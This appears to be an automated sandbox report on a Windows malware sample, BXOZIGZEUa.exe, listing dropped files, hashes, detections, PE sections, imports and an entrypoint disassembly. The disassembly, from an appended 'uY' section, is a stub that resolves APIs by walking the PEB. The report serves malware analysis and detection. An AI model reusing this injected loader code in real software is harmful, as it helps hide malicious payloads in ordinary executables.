File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6256
Entropy (8bit):	3.7193291305423744
Encrypted:	false
SSDEEP:	192:R6l7wVeJ8C56WYYwwWuqBpDO89bMJsfGkm:R6lXJ8c6pYwwWZMifc
MD5:	B6ECCFED0F4BDE3496596D6D8ECF619A
SHA1:	5FD5BB4F81BBD7140816BAEE0CD4F6D8FF104A72
SHA-256:	895346079DED69558521EBA12D8D27E6D6BA7649690C9C11683592654392CF7E
SHA-512:	DA724F07E9623E3FE2978062B0CF54BBD859F94DF91E8F1046ADEFD5F81E09C751DAC966FE9DF618AAD14F7C7B406E3EBC72E213CD37C0F7DA9843800A886FB0
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.0.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD1A7.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4537
Entropy (8bit):	4.442795914005458
Encrypted:	false
SSDEEP:	48:cvIwWl8zsPqJg77aI9M/WpW8VYkYm8M4JwGFq+q8m9U0zgqhQd:uIjfP4I72u7VkJc1U0zgqhQd
MD5:	ADE30EFBC5A0191157926B272D617658
SHA1:	514A5A73415994A7ACD928711884D5AB845F633F
SHA-256:	B5496741C294EC2E5527E8124B51E750CB618919D65F0F7A6C94221D93A2DD1C
SHA-512:	C8A069C0CDA809D1A836AAC71F841E3DB4E0A6EF7D424BDE285067F2C067AB94476FE05A520734ACE12E6BDAB30F3E075A82151B51BF380F634C62764C2DE074
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="665043" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\k1[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\JdEV.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\k2[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\JdEV.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\3B2E4D6A.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\JdEV.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\44FA2422.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\JdEV.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\JdEV.exe

Download File

Process:	C:\Users\user\Desktop\BXOZIGZEUa.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	7.031113762428177
Encrypted:	false
SSDEEP:	384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
MD5:	56B2C3810DBA2E939A8BB9FA36D3CF96
SHA1:	99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
SHA-256:	4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
SHA-512:	27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 97%
Joe Sandbox View:	Filename: ArjM1qx3hV.exe, Detection: malicious, Browse Filename: aRxo3E278B.exe, Detection: malicious, Browse Filename: yRc7UfFif9.exe, Detection: malicious, Browse Filename: gT6IitwToH.exe, Detection: malicious, Browse Filename: #U65b0#U7248#U7f51#U5173.exe, Detection: malicious, Browse Filename: #U8865#U4e01#U6253#U5305.exe, Detection: malicious, Browse Filename: #U65b0#U7248#U7f51#U5173Srv.exe, Detection: malicious, Browse Filename: gE4NVCZDRk.exe, Detection: malicious, Browse Filename: ib.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

C:\Windows\INF\oem0.PNF

Download File

Process:	C:\Users\user\Desktop\BXOZIGZEUa.exe
File Type:	Windows Precompiled iNF, version 3.3 (Windows 10), flags 0x1000083, unicoded, has strings, at 0x1158 "Signature", at 0x68 WinDirPath, LanguageID 809
Category:	dropped
Size (bytes):	5884
Entropy (8bit):	3.2100538689449323
Encrypted:	false
SSDEEP:	96:16T0jnDWLlB9Su3H75DjLocg8IwJR56mXkR/1fszenFWhH:sCyZSuXVDjLor8IwJRMm0wzOEp
MD5:	5F167C05E471EB855F876E5F670AA73C
SHA1:	88BE1D17384EE549AAE791F326C35F60D194C1A6
SHA-256:	4FAF06C683C2F6680B0B3F73C6A99E3FD84014CC2BD3DB6863F56F288F3FD13F
SHA-512:	CF8CCDCCBF16BF10B91B0DE0076369CA3985EDB1976616F57C82783685AC890C8FA5A388AC2066163B6B9119BA9C0DE4FE6ED39161DF0B3DF06C2555AC9F8076
Malicious:	false
Preview:	................H...X....d..................................h...,.......0.......h.......................C.:.\.W.i.n.d.o.w.s.........................................................................................................\...................................................................\|.......................\|...........................................................................................................................................................................`.......H.......................................................................L...................................................................................................................@...........................................................................................................................................................h.......................t...................................................................................................................................

C:\Windows\INF\oem1.PNF

Download File

Process:	C:\Users\user\Desktop\BXOZIGZEUa.exe
File Type:	Windows Precompiled iNF, version 3.3 (Windows 10), flags 0x1000083, unicoded, has strings, at 0x1100 "Signature", at 0x68 WinDirPath, LanguageID 809
Category:	dropped
Size (bytes):	5740
Entropy (8bit):	3.173847699149194
Encrypted:	false
SSDEEP:	96:EHv3dP0/4NiuIR0ONNjnuUw8u5pF6KXkRQ1fsCncekSDzD:E1viuCVDjuT8u5p4K05CcWDzD
MD5:	3821A155A04A6A2E4811B60BEE95BA38
SHA1:	76E66DB688BD24BC907D7EF90A951D4CD74FB710
SHA-256:	6931E4EA0B4B6C80DA549F8EAA738639FBC03590B0429C773C5E6D75085E80D4
SHA-512:	DF33A4829683F534C505FADC7BE5BB2899614A42FE85446ABA8593D4C13D065C25871557563F9F3D7F1BAEA4927788B184573B9A8CC4C248BA873AEB8D0E1B18
Malicious:	false
Preview:	................H..................................H...............(.......H...h...............h.......C.:.\.W.i.n.d.o.w.s.....x...................................................$...............................................................................................................d...(...........................................................................................................................................................................................................................................................x...................................................................$...............................................................................................4...........................0.......................................................................................................................................................................................................p...........................................................

C:\Windows\INF\oem3.PNF

Download File

Process:	C:\Users\user\Desktop\BXOZIGZEUa.exe
File Type:	Windows Precompiled iNF, version 3.3 (Windows 10), flags 0x1000083, unicoded, has strings, at 0x1210 "Signature", at 0x68 WinDirPath, LanguageID 809
Category:	dropped
Size (bytes):	6284
Entropy (8bit):	3.210060094944142
Encrypted:	false
SSDEEP:	96:f4rgQY2e/NI0IXSu6o4zvM181fQ1UvZUuQSCUJ:b2e/BfosxZUK/
MD5:	37B7D5A41FF318D021B72C680E68CC3B
SHA1:	69977EC82CFD33B3A06BA4DD06553CE6E8FDD256
SHA-256:	81E03C26AA1707F2019E050037D31F89B80F808CE9F4C5CE804FC43BE1E22355
SHA-512:	F112FF23C1542737CB3A519C862F9A746F7922BD0983B942A03099942D23C8AD219B02A2ACD6F4C2E442E8A23009C0E460238A69DE7331FD1A071FC4E78353C3
Malicious:	false
Preview:	................X........K.}........................h.......p...D.......d... ...h.......................C.:.\.W.i.n.d.o.w.s.............................................................................................................................................................................................................H...........................................8.......................................H.......................................................................................................................................................................................................................................,.......................................................................................................................................................................................................................................................................................................h...............................................8...........

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\AppData\Local\Temp\JdEV.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.2987269006200926
Encrypted:	false
SSDEEP:	6144:sECqOEmWfd+WQFHy/9026ZTyaRsCDusBqD5dooi8lMSD6VJSR1M:pCsL6seqD5SpSWVARK
MD5:	DCA0323FD27A848F1231ADA65D9267E1
SHA1:	67B37F28790DD435F35B5D6F4B245B60E42AF332
SHA-256:	D174D043F7E33191E75FA6C80F8B20A95D96BD36399D228A32F17C93360CB602
SHA-512:	AA58222CFDF0E8187DA484E53D377B7F128B3F838777A6E476C76AA0A8B96886F6EEF178D4A22E8A286BE385037A69A7E071E1079031B7052C75E3FCFA85023A
Malicious:	false
Preview:	regfE...E....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmN..,.`..............................................................................................................................................................................................................................................................................................................................................)..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	6.426054235926492
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	BXOZIGZEUa.exe
File size:	1'700'352 bytes
MD5:	fa07873f37b171a5567a9b4b3f2c65eb
SHA1:	47d5210522d8c54d3076c1467f2f495025037bb6
SHA256:	8f5469d96f148afd08a0f693684f9bb0195a5291eb2437214c01465b463acbf8
SHA512:	68a8f289ea6acdd7b79595cd8f7cde9ff468f2e26b56e1b7cef024b8a999f834a94e43c165a5a9b0c4b42008afb7b9446b29aa2019c68133d65409d631c19f29
SSDEEP:	49152:XE4XbjEKOh3SbiwJjn7gu5LUvdW9apuLvht/cionurM0EIMa1:Xrj834iwJjn7gu5LmMapuNiiMurM0
TLSH:	96759D3136908077C67B32319B9AA3FDB6F9A5304D35524B56A10E3C2E709D3A92C76F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7Nd.s/..s/..s/..zW..r/..zW.../..h..._/..h..../..h.......zW..V/..s/...-..h...q/..h...r/..h...r/..Richs/..........PE..L.....q]...

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x5a6000
Entrypoint Section:	uY
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5D71F817 [Fri Sep 6 06:09:27 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	6f75980df73bd959bec9fcfb664cfd02

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0000016Ch
xor eax, eax
push ebx
push esi
push edi
mov dword ptr [ebp-24h], eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-14h], eax
mov dword ptr [ebp-08h], eax
mov dword ptr [ebp-0Ch], eax
mov dword ptr [ebp-20h], eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-48h], 5645644Ah
mov dword ptr [ebp-44h], 6578652Eh
mov dword ptr [ebp-40h], 00000000h
mov dword ptr [ebp-3Ch], 00000000h
call 00007F39A8EC23A5h
pop eax
add eax, 00000225h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr fs:[00000030h]
mov dword ptr [ebp-28h], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax], E904C483h
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax+04h], FFF58236h
mov eax, dword ptr [ebp-28h]
mov eax, dword ptr [eax+0Ch]
mov eax, dword ptr [eax+1Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+08h]
mov ecx, dword ptr [eax+3Ch]
mov ecx, dword ptr [ecx+eax+78h]
add ecx, eax
mov edi, dword ptr [ecx+1Ch]
mov ebx, dword ptr [ecx+20h]
mov esi, dword ptr [ecx+24h]
mov ecx, dword ptr [ecx+18h]
add esi, eax
add edi, eax
add ebx, eax
xor edx, edx
mov dword ptr [ebp-30h], esi
mov dword ptr [ebp-1Ch], edx
mov dword ptr [ebp-34h], ecx
cmp edx, dword ptr [ebp-34h]
jnc 00007F39A8EC24EEh
movzx ecx, word ptr [esi+edx*2]
mov edx, dword ptr [ebx+edx*4]
mov esi, dword ptr [edi+ecx*4]
add edx, eax
mov ecx, dword ptr [edx]
add esi, eax
cmp ecx, 4D746547h
jne 00007F39A8EC23F4h
cmp dword ptr [edx+04h], 6C75646Fh
jne 00007F39A8EC23EBh

Rich Headers

Programming Language:

[C++] VS2008 SP1 build 30729
[ C ] VS2008 SP1 build 30729
[ASM] VS2010 SP1 build 40219
[ C ] VS2010 SP1 build 40219
[C++] VS2010 SP1 build 40219
[IMP] VS2008 SP1 build 30729
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x169250	0x168	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x17b000	0x6d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x17c000	0x1a450	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x128d40	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x152ba0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x128000	0x934	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1268a3	0x126a00	f488be5fc3a676598f8a364845853fad	False	0.5610067750318201	data	6.539294700431528	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x128000	0x444ba	0x44600	e3d187bee7a20b52c8a5aa950dc5959c	False	0.27052745086837293	data	5.047397246056738	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x16d000	0xdb04	0x6000	2f590fbdc2c5ab2e1fce65b7a0243ebb	False	0.2849934895833333	data	4.7641816505688	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x17b000	0x6d8	0x800	18b01f74d64d681072db0f41366c4eb8	False	0.353515625	data	4.6625627260129	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x17c000	0x293f4	0x29400	3edbefab711cfe5d831cbd18bbf4c4bd	False	0.26879142992424243	data	4.982795266679088	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
uY	0x1a6000	0x5000	0x4200	0cbe2dac05299bb6514c66d11d100775	False	0.7771070075757576	data	6.933836062310107	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_STRING	0x17b0e8	0x3e	data	English	United States	0.6612903225806451
RT_VERSION	0x17b128	0x344	data	Chinese	China	0.4258373205741627
RT_MANIFEST	0x17b46c	0x26a	ASCII text, with very long lines (618), with no line terminators	English	United States	0.43042071197411

Imports

DLL	Import
SETUPAPI.dll	SetupGetStringFieldW, SetupDiDestroyDeviceInfoList, SetupDiCallClassInstaller, SetupDiGetDeviceRegistryPropertyW, SetupDiEnumDeviceInfo, SetupDiGetClassDevsW, SetupFindNextLine, SetupCloseInfFile, SetupFindFirstLineW, SetupOpenInfFileW, SetupUninstallOEMInfW
KERNEL32.dll	IsProcessorFeaturePresent, HeapCreate, FreeEnvironmentStringsW, IsValidCodePage, QueryPerformanceCounter, GetStringTypeW, GetTimeZoneInformation, GetConsoleMode, EnumSystemLocalesA, IsValidLocale, WriteConsoleW, GetDriveTypeW, SetEnvironmentVariableA, CreateFileA, GetConsoleCP, GetLocaleInfoA, LCMapStringW, GetOEMCP, GetACP, GetCPInfo, GetStartupInfoW, GetStdHandle, SetHandleCount, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, GetFileType, GetProcessHeap, SetStdHandle, VirtualQuery, GetSystemInfo, VirtualAlloc, GetSystemTimeAsFileTime, HeapSize, HeapQueryInformation, CreateThread, ExitThread, HeapReAlloc, RaiseException, ExitProcess, RtlUnwind, HeapAlloc, HeapSetInformation, HeapFree, DecodePointer, EncodePointer, FindResourceExW, GetUserDefaultLCID, VirtualProtect, GetNumberFormatW, SearchPathW, Sleep, GetProfileIntW, GetTickCount, GetFileTime, GetFileSizeEx, GetFileAttributesExW, GetTempPathW, GetTempFileNameW, GetFullPathNameW, GetVolumeInformationW, GetCurrentProcess, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, CreateFileW, lstrcmpiW, FreeResource, GlobalFindAtomW, InitializeCriticalSectionAndSpinCount, lstrlenA, GlobalGetAtomNameW, GetCurrentProcessId, GlobalAddAtomW, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileIntW, InterlockedIncrement, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, TlsAlloc, InitializeCriticalSection, GlobalHandle, GlobalReAlloc, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, CompareStringW, GlobalFlags, InterlockedDecrement, ReleaseActCtx, CreateActCtxW, GetVersionExW, lstrcpyW, GetSystemDirectoryW, GetCurrentDirectoryW, WaitForSingleObject, ResumeThread, SetThreadPriority, CloseHandle, FileTimeToLocalFileTime, FileTimeToSystemTime, FindFirstFileW, FindNextFileW, FindClose, GlobalFree, CopyFileW, GlobalSize, GlobalUnlock, FormatMessageW, MulDiv, SetErrorMode, lstrcmpA, GlobalDeleteAtom, GetCurrentThread, GetCurrentThreadId, GetModuleFileNameW, GetUserDefaultUILanguage, ConvertDefaultLocale, GetSystemDefaultUILanguage, ActivateActCtx, LoadLibraryW, DeactivateActCtx, SetLastError, MultiByteToWideChar, GlobalLock, lstrcmpW, GlobalAlloc, GetProcAddress, FreeLibrary, GetLocaleInfoW, LoadLibraryExW, InterlockedExchange, LocalAlloc, LocalFree, SetFileAttributesW, GetFileAttributesW, DeleteFileW, WideCharToMultiByte, lstrlenW, GetLastError, GetWindowsDirectoryW, FindResourceW, LoadResource, LockResource, SizeofResource, GetModuleHandleW, GetCommandLineW, GetEnvironmentStringsW
USER32.dll	RegisterClipboardFormatW, EmptyClipboard, CloseClipboard, SetClipboardData, OpenClipboard, GetMenuDefaultItem, CreateDialogIndirectParamW, GetNextDlgTabItem, EndDialog, GetUpdateRect, FrameRect, IsClipboardFormatAvailable, SetMenuDefaultItem, WaitMessage, PostThreadMessageW, CreateMenu, IsMenu, UpdateLayeredWindow, EnableScrollBar, UnionRect, MonitorFromPoint, TranslateMDISysAccel, DrawMenuBar, DefMDIChildProcW, DefFrameProcW, UnpackDDElParam, ReuseDDElParam, LoadImageW, InsertMenuItemW, TranslateAcceleratorW, CopyImage, DestroyIcon, LockWindowUpdate, BringWindowToTop, SetCursorPos, SetRect, CreateAcceleratorTableW, LoadAcceleratorsW, GetKeyboardState, GetKeyboardLayout, MapVirtualKeyW, ToUnicodeEx, CopyAcceleratorTableW, DrawFocusRect, DrawFrameControl, DrawEdge, DrawIconEx, DrawStateW, MessageBeep, ReleaseCapture, SetCapture, GetSystemMenu, LoadMenuW, IntersectRect, SetClassLongW, GetAsyncKeyState, NotifyWinEvent, WindowFromPoint, CreatePopupMenu, DestroyAcceleratorTable, SetParent, SetWindowRgn, IsZoomed, IsIconic, OffsetRect, IsRectEmpty, DestroyMenu, GetMenuItemInfoW, InflateRect, CharUpperW, ShowWindow, MoveWindow, IsDialogMessageW, CopyIcon, CheckDlgButton, RegisterWindowMessageW, LoadIconW, SendDlgItemMessageW, SendDlgItemMessageA, WinHelpW, IsChild, GetCapture, GetClassLongW, SetPropW, GetPropW, RemovePropW, IsWindow, SetFocus, GetForegroundWindow, SetActiveWindow, BeginDeferWindowPos, EndDeferWindowPos, GetDlgItem, GetTopWindow, DestroyWindow, GetMessageTime, GetMessagePos, MonitorFromWindow, ScrollWindow, TrackPopupMenu, SetMenu, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, RedrawWindow, CreateWindowExW, GetClassInfoExW, RegisterClassW, AdjustWindowRectEx, EqualRect, DeferWindowPos, GetScrollInfo, SetScrollInfo, SetWindowPlacement, GetWindowPlacement, CallWindowProcW, GetMenu, SetWindowLongW, SetWindowPos, GetWindowTextLengthW, GetWindowThreadProcessId, GetLastActivePopup, PostQuitMessage, PostMessageW, RemoveMenu, GetSubMenu, GetMenuItemCount, IsWindowEnabled, EnableWindow, MessageBoxW, KillTimer, SetTimer, InvalidateRect, UpdateWindow, GetDesktopWindow, RealChildWindowFromPoint, GetWindow, GetDlgCtrlID, GetWindowRect, GetWindowLongW, GetClassNameW, PtInRect, CharUpperBuffW, GetDoubleClickTime, GetIconInfo, IsCharLowerW, GetKeyNameTextW, MapVirtualKeyExW, SubtractRect, InvertRect, MapDialogRect, HideCaret, GetNextDlgGroupItem, GetWindowTextW, SetWindowTextW, EndPaint, BeginPaint, GetWindowDC, ReleaseDC, GetDC, ClientToScreen, ScreenToClient, GrayStringW, GetWindowRgn, DestroyCursor, DrawIcon, InsertMenuW, GetMenuItemID, AppendMenuW, GetMenuStringW, GetMenuState, ValidateRect, GetCursorPos, PeekMessageW, GetKeyState, SendMessageW, IsWindowVisible, GetActiveWindow, DispatchMessageW, TranslateMessage, GetMessageW, CallNextHookEx, SetWindowsHookExW, CheckMenuItem, EnableMenuItem, ModifyMenuW, GetParent, GetFocus, LoadBitmapW, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, SetCursor, ShowOwnedPopups, DeleteMenu, CopyRect, SetRectEmpty, GetMonitorInfoW, SystemParametersInfoW, EnumDisplayMonitors, GetSystemMetrics, GetSysColor, SetLayeredWindowAttributes, LoadCursorW, GetClientRect, MapWindowPoints, DefWindowProcW, GetClassInfoW, GetSysColorBrush, UnhookWindowsHookEx, FillRect, TabbedTextOutW, DrawTextW, DrawTextExW
GDI32.dll	GetObjectType, CreateHatchBrush, GetTextExtentPoint32W, CreateDIBSection, CreateRoundRectRgn, CreatePolygonRgn, CombineRgn, GetBkColor, GetTextColor, PatBlt, CreateEllipticRgn, Polyline, Ellipse, Polygon, SetRectRgn, DPtoLP, OffsetRgn, GetRgnBox, SetDIBColorTable, RealizePalette, StretchBlt, SetPixel, SelectPalette, CreatePalette, GetPaletteEntries, GetNearestPaletteIndex, GetSystemPaletteEntries, LPtoDP, GetWindowOrgEx, GetViewportOrgEx, PtInRegion, FillRgn, FrameRgn, GetBoundsRect, ExtFloodFill, SetPaletteEntries, EnumFontFamiliesExW, GetTextFaceW, SetPixelV, SetViewportOrgEx, SelectObject, Escape, DeleteDC, ExtSelectClipRgn, ScaleWindowExtEx, SetWindowExtEx, OffsetWindowOrgEx, SetWindowOrgEx, ScaleViewportExtEx, SetViewportExtEx, CreateCompatibleBitmap, GetObjectW, CreateFontIndirectW, CreatePatternBrush, CreateSolidBrush, CreatePen, GetStockObject, CreateDIBitmap, CreateBitmap, CreateDCW, CopyMetaFileW, Rectangle, GetDeviceCaps, ExtTextOutW, TextOutW, RectVisible, PtVisible, GetPixel, GetWindowExtEx, GetViewportExtEx, CreateRectRgn, SelectClipRgn, SetLayout, GetLayout, SetTextAlign, MoveToEx, LineTo, IntersectClipRect, ExcludeClipRect, GetClipBox, SetMapMode, 